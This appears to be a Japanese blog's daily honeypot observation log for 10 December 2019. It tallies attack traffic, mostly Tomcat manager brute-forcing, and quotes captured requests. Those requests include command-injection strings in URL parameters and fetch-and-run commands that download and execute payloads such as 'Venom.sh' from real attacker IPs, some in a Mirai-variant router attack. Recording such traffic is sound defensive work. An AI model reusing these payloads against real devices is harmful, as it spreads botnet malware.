WOWHoneypot観察(269日目)
2019/12/10(火)
トータルは4066件でした。
ハンティングログは以下です。
142.93.245[.]188 wget hxxp[:]//51.79.66[.]236/Venom.sh |
www.virustotal.com
www.virustotal.com
208.113.204[.]147 wget hxxp[:]//80.82.67[.]209/richard; curl -O hxxp[:]//80.82.67.209/richard |
208.113.204[.]147 curl -O hxxp[:]//80.82.67[.]209/richard |
149.202.251[.]78 wget hxxp[:]//80.82.67[.]209/richard; curl -O hxxp[:]//80.82.67[.]209/richard |
149.202.251[.]78 curl -O hxxp[:]//80.82.67[.]209/richard |
www.virustotal.com
www.virustotal.com
件数 | 概要 | リクエスト | ||
---|---|---|---|---|
4012 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html | ||
40 | アクセス | GET / | ||
3 | POST /service/krashrpt.php?kuid=`id%20 | %20wget%20hxxp[:]//80.82.67.209/richard;%20curl%20-O%20hxxp[:]//80.82.67.209/richard;%20chmod%20+x%20richard;%20sh%20richard` | ||
2 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList | ||
2 | NetGearルーターの脆弱性を狙った通信 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | ||
2 | phpMyAdminの調査 | GET /admin-scripts.asp | ||
1 | Enigma NMSの脆弱性を狙った通信 | POST /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address= | wget%20hxxp[:]//80.82.67.209/richard;%20curl%20-O%20hxxp[:]//80.82.67.209/richard;%20chmod%20+x%20richard;%20sh%20richard;/evil.php | php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1 |
1 | 不明 | HEAD /esps/ | ||
1 | ルーターの脆弱性を狙ったMirai亜種の攻撃 | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp[:]//51.79.66.236/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ | ||
1 | ログインページ調査 | GET /login | ||
1 | 調査 | GET /index.php |